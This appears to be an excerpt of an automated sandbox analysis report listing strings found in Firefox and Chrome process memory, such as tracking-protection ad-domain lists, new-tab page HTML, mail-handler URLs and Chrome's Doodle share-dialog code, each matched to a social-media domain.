the Recommended by Pocket section:(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueYou may not unsubscribe from a store listener while the reducer is executing. See https://redux.js.org/api-reference/store#subscribe(listener) for more details.Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single function(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(browserSettings.update.channel == "release") && ((experiment.slug in activeExperiments) \|\| ((!os.isMac) && (version\|versionCompare('111.!') >= 0)))DeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F73000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: UpdateService:_postUpdateProcessing - removing update for older application version or same application version with same build ID. update application version: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636605000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3391045339.000001B636603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001D.00000002.3391045339.000001B63660E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3391045339.000001B63660E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null}, ["blocking"]]8& equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3418311411.000001B636A64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.3251964411.000001B631F7B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: browser.fixup.dns_first_for_single_wordsand deploy previews URLs are allowed.devtools-commandkey-profiler-capturedevtools/client/framework/devtoolsDevToolsStartup.jsm:handleDebuggerFlagUnable to start devtools server on Got invalid request to save JSON dataFailed to listen. Listener already attached.browser.urlbar.dnsResolveFullyQualifiedNamesdevtools.debugger.features.javascript-tracingdevtools-commandkey-javascript-tracing-togglereleaseDistinctSystemPrincipalLoaderNo callback set for this channel.browser and that URL. Falling back to devtools-commandkey-profiler-start-stopdevtools.performance.recording.ui-base-urldevtools.debugger.remote-websocketresource://devtools/server/devtools-server.js^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$resource://devtools/shared/security/socket.jsDevTools telemetry entry point failed: WebChannel/this._originCheckCallback@mozilla.org/dom/slow-script-debug;1devtools/client/framework/devtools-browserdevtools.performance.popup.feature-flag{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}JSON Viewer's onSave failed in startPersistence@mozilla.org/network/protocol;1?name=file@mozilla.org/network/protocol;1?name=default@mozilla.org/uriloader/handler-service;1Failed to listen. Callback argument missing.Failed to execute WebChannel callback:https://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjsextractScheme/fixupChangedProtocol<gecko.handlerService.defaultHandlersVersionresource://gre/modules/FileUtils.sys.mjs@mozilla.org/uriloader/web-handler-app;1Scheme should be either http or httpsresource://gre/modules/JSONFile.sys.mjsget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAG_FORCE_ALTERNATE_URI{c6cf88b7-452e-47eb-bdc9-86e3561648ef}http://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shandlerSvc fillHandlerInfo: don't know this typeget FIXUP_FLAGS_MAKE_ALTERNATE_URIisDownloadsImprovementsAlreadyMigratedhttps://mail.inbox.lv/compose?to=%s^([a-z+.-]+:\/{0,3})([^\/@]+@).+browser.fixup.domainsuffixwhitelist.https://mail.yahoo.co.jp/compose/?To=%shttp://www.inbox.lv/rfc2368/?value=%s^([a-z][a-z0-9.+\t-])(:\|;)?(\/\/)?@mozilla.org/uriloader/local-handler-app;1{33d75835-722f-42c0-89cc-44f328e56a86}^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]\|$)_injectDefaultProtocolHandlersIfNeededCan't invoke URIFixup in the content processhttp://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1_finalizeInternal/this._finalizePromise<resource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1@mozilla.org/network/simple-stream-listener;1@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentextension/bing@search.mozilla.org/extendedData equals www.yahoo.com (Yahoo)
Source: chrome.exe, 0000001E.00000003.3084933722.000051F40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3085171074.000051F400FD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 0000001E.00000003.3084933722.000051F40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001E.00000003.3085171074.000051F400FD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001D.00000002.3290075534.000001B633630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: doff-text" data-l10n-args="{"engine": "Google"}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"YouTube"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001D.00000002.3453320165.000001B6381A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3251964411.000001B631FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
